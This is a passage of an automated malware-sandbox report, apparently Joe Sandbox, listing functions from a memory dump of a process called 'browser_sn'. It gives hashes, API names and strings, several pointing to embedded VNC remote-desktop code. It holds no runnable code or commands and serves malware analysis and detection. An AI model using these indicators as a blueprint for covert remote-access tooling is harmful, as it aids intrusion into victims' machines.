                                                                            • Opcode Fuzzy Hash: 87e8c0d61f37e34202edbdab6bff78c1ba5551bc53e556ab61ee4318769b540b
                                                                            • Instruction Fuzzy Hash: 95311272908B8286EBA09F10F4553AAB3B0FB88759F800135EBCD82B54DFBCD159CB40
                                                                            Function 00007FF6C2BAF790 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 63windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Desktop$CloseEnumFindInfoMessageOpenParametersPostSystemVersionWindowWindows
                                                                            • String ID: Screen-saver$WindowsScreenSaverClass$vncdesktop.cpp : KillScreenSaver...$vncdesktop.cpp : Killing ScreenSaver
                                                                            • API String ID: 1547096108-1130181218
                                                                            • Opcode ID: 0218681f0ca0f0cb8045d3d881905bd2119dca5bb8d2230a423cfe654c101359
                                                                            • Instruction ID: da4cad5a33ee1ac9c2ab281c1bf08598c8fbaf47b7aa659d3a5471f0b4d2029d
                                                                            • Opcode Fuzzy Hash: 0218681f0ca0f0cb8045d3d881905bd2119dca5bb8d2230a423cfe654c101359
                                                                            • Instruction Fuzzy Hash: E1312F25A18A42C2FBA0DF51E861BB93360FF9574EF845131DE8D82795DEBCE109C750
                                                                            Function 00007FF6C2B847C0 Relevance: 18.3, APIs: 12, Instructions: 288COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$CountEnterLeaveTick
                                                                            • String ID:
                                                                            • API String ID: 1056156058-0
                                                                            • Opcode ID: 4e1fcf1f9d5970b8c335a6cd4b3d0a08090c87295cd844a4afdb87dd54e77e75
                                                                            • Instruction ID: 70e791335c969e7394523ff03782b79326751cbf130749b5fa87e108b551db95
                                                                            • Opcode Fuzzy Hash: 4e1fcf1f9d5970b8c335a6cd4b3d0a08090c87295cd844a4afdb87dd54e77e75
                                                                            • Instruction Fuzzy Hash: 79D13836A09B8689EB50CF29E4402A877E4FB55B8EF404136DE8C87B68DFBCE451C754
                                                                            Function 00007FF6C2B90760 Relevance: 18.2, APIs: 12, Instructions: 181COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Combine$DataDeleteObjectRegion$free
                                                                            • String ID:
                                                                            • API String ID: 1378972593-0
                                                                            • Opcode ID: cb15224673a3dfde0a5a84031da156aebc3bdcfdfc834712c68d2b408893385e
                                                                            • Instruction ID: 68863198c7c467dd25204c55b041d1d10d08fa9de6faab76fd110d0deaa7d52b
                                                                            • Opcode Fuzzy Hash: cb15224673a3dfde0a5a84031da156aebc3bdcfdfc834712c68d2b408893385e
                                                                            • Instruction Fuzzy Hash: CF71A0B660468286EB50CF1AE4405AEBBB0FB49BD9B448032DF8D83754CF7DD591CB40
                                                                            Function 00007FF6C2B9DA10 Relevance: 18.1, APIs: 12, Instructions: 111COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DeleteObjectfree$CombineCriticalSection$CreateEnterLeaveRect
                                                                            • String ID:
                                                                            • API String ID: 707770685-0
                                                                            • Opcode ID: e8ce359a573d540e0fad56669d64a20bc3cc88b06a8798c1e7988a6509252d61
                                                                            • Instruction ID: 170a4991279d50e0cec4cf1a62cf87c7d60cfbb11bc7bc1ffd13023b8365289f
                                                                            • Opcode Fuzzy Hash: e8ce359a573d540e0fad56669d64a20bc3cc88b06a8798c1e7988a6509252d61
                                                                            • Instruction Fuzzy Hash: BA416026608A4286D750EF2AE8842A97770FBC9BDAF540231EF9E837A5CF7CD505C700
                                                                            Function 00007FF6C2BF0440 Relevance: 18.1, APIs: 12, Instructions: 110memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Global$Free$Unlock$Lock$Allocfree
                                                                            • String ID:
                                                                            • API String ID: 2417228145-0
                                                                            • Opcode ID: 83e6b6226f67f1017ea51708f5668e2a6f5a10fa7ee1f8b094fae28aff0d63d9
                                                                            • Instruction ID: bf0d613d6d526e6894703e9290390fb1eb0f1751f52be46cd7acb157253599aa
                                                                            • Opcode Fuzzy Hash: 83e6b6226f67f1017ea51708f5668e2a6f5a10fa7ee1f8b094fae28aff0d63d9
                                                                            • Instruction Fuzzy Hash: BA51F43A604B4285DB90CF26E4802E977B0FB98F99F094436CE9D87768DFB8D484D750
                                                                            Function 00007FF6C2B909E0 Relevance: 18.1, APIs: 12, Instructions: 97COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Combine$DeleteObjectfree$CreateRect
                                                                            • String ID:
                                                                            • API String ID: 3143477926-0
                                                                            • Opcode ID: 0a56b58438f5393381c87e283caa4a4dd7c9b87ade4efda876708c0d747ae0c3
                                                                            • Instruction ID: 0b28ee88e6be46fe703bd637441a8a6d2569dec1fc71971beb511c362e6d6e45
                                                                            • Opcode Fuzzy Hash: 0a56b58438f5393381c87e283caa4a4dd7c9b87ade4efda876708c0d747ae0c3
                                                                            • Instruction Fuzzy Hash: 04413C72608A8281DB90DF16E8944AAB730FB86BDAF405132EF9E87768DF7CD545C740
                                                                            Function 00007FF6C2BA6A3E Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 269COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close$DesktopHandle$CriticalInputLeaveOpenSection
                                                                            • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                            • API String ID: 4065787043-3977938048
                                                                            • Opcode ID: 0e262a7b282e981c073c17538394abbb85f0724c42d2ac0d5b9c636311db132c
                                                                            • Instruction ID: 28a780cd3a751b17e8ae8c27059cc090285db18a58b7407d1b055a24730a7934
                                                                            • Opcode Fuzzy Hash: 0e262a7b282e981c073c17538394abbb85f0724c42d2ac0d5b9c636311db132c
                                                                            • Instruction Fuzzy Hash: 03E18022A0868185E794CF25C458BBE7BB1EB86B9EF154235CE9C877E5CFB8D445C700
                                                                            Function 00007FF6C2B9FC70 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Desktop$Thread$getpeernameinet_ntoamalloc$CloseCurrentDialogInputOpenParam
                                                                            • String ID: <unavailable>$Default
                                                                            • API String ID: 424836046-797050109
                                                                            • Opcode ID: cd7e6ef6a6473ab206da223ea4725d2a86cef141e2c088cd8582ebea0bfae6ee
                                                                            • Instruction ID: b84fa8af2b8b29f995b691ee5a2641db21478ff33559ad0c607895218ccae03b
                                                                            • Opcode Fuzzy Hash: cd7e6ef6a6473ab206da223ea4725d2a86cef141e2c088cd8582ebea0bfae6ee
                                                                            • Instruction Fuzzy Hash: 73615A26A08A4682EB60AF25D4942BD33B4FB85B9EF044135DE8E87795DFBCE855C340
                                                                            Function 00007FF6C2B91A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 98libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: WTSEnumerateProcessesA$WTSFreeMemory$winlogon.exe$wtsapi32
                                                                            • API String ID: 145871493-4162899161
                                                                            • Opcode ID: 0adbf5e9dd7c30560f15780b9e5a176f1c63490ee2f09b9478d032169a347fac
                                                                            • Instruction ID: 9fbe1bc3d0d067e91b068780b539a32733f994996b8a87226cd53da588a6bd02
                                                                            • Opcode Fuzzy Hash: 0adbf5e9dd7c30560f15780b9e5a176f1c63490ee2f09b9478d032169a347fac
                                                                            • Instruction Fuzzy Hash: 6F41C132619B4286E650DF09E8401B973B1FB86BA9F444236DE9D83794EF7CE455C300
                                                                            Function 00007FF6C2B92520 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: Console$WTSEnumerateSessionsA$WTSFreeMemory$wtsapi32
                                                                            • API String ID: 145871493-4083478734
                                                                            • Opcode ID: 6cf080f84c71be26cb1bfa4edcfbd06d998d32083e0e310b716d811f44676067
                                                                            • Instruction ID: 0fc57c50685f3db099f71e35157ba4e2fbd78337c822ad449381b64b96c6bf91
                                                                            • Opcode Fuzzy Hash: 6cf080f84c71be26cb1bfa4edcfbd06d998d32083e0e310b716d811f44676067
                                                                            • Instruction Fuzzy Hash: C8416222A09B4286EA60DF15E88027572B1FF967AAF540535DEDD83794DF7CE864C700
                                                                            Function 00007FF6C2BA0430 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 86libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Library$FileLoadModuleName$AddressFreeProc_errno_invalid_parameter_noinfo
                                                                            • String ID: LOGFAILED$LOGLOGON$\logging.dll$vncclient.cpp : authentication failed
                                                                            • API String ID: 2822070703-2230024269
                                                                            • Opcode ID: 7268cd8e022df83657ed39b417004c309e717e39cebfd43f9550cd34ab281d12
                                                                            • Instruction ID: 94d39846271f6117c9be4d78b1507c4b6e0a68446e2a17d372679a5629717e55
                                                                            • Opcode Fuzzy Hash: 7268cd8e022df83657ed39b417004c309e717e39cebfd43f9550cd34ab281d12
                                                                            • Instruction Fuzzy Hash: 5C417125608B8281EBA0CF25E8442A977B0FB4979AF404636DEDDC3B95DF7DE514C700
                                                                            Function 00007FF6C2BEA4A0 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 70COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Desktop$CloseOpenThread$CurrentInformationInputObjectUser
                                                                            • String ID: vncservice.cpp : OpenInputdesktop2 $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : OpenInputdesktop2 named$vncservice.cpp : SelectDesktop $vncservice.cpp : SelectDesktop failed to close desktop
                                                                            • API String ID: 82840795-1493190668
                                                                            • Opcode ID: 73df31c4d5bc5f508eb8bf5ae158792ec5ac75f1685a591efa5a54c35b3d65c6
                                                                            • Instruction ID: 0c3eedb57ac51e571d6dcce3454feda6b4bee4c53632b29cf2b462e0a9986aa1
                                                                            • Opcode Fuzzy Hash: 73df31c4d5bc5f508eb8bf5ae158792ec5ac75f1685a591efa5a54c35b3d65c6
                                                                            • Instruction Fuzzy Hash: 0721A364F1894381FB94DF65BC414F523A1AF8AB8EF884032DE9EC6356DEBCE5558340
                                                                            Function 00007FF6C2BEC970 Relevance: 17.5, APIs: 6, Strings: 4, Instructions: 46libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
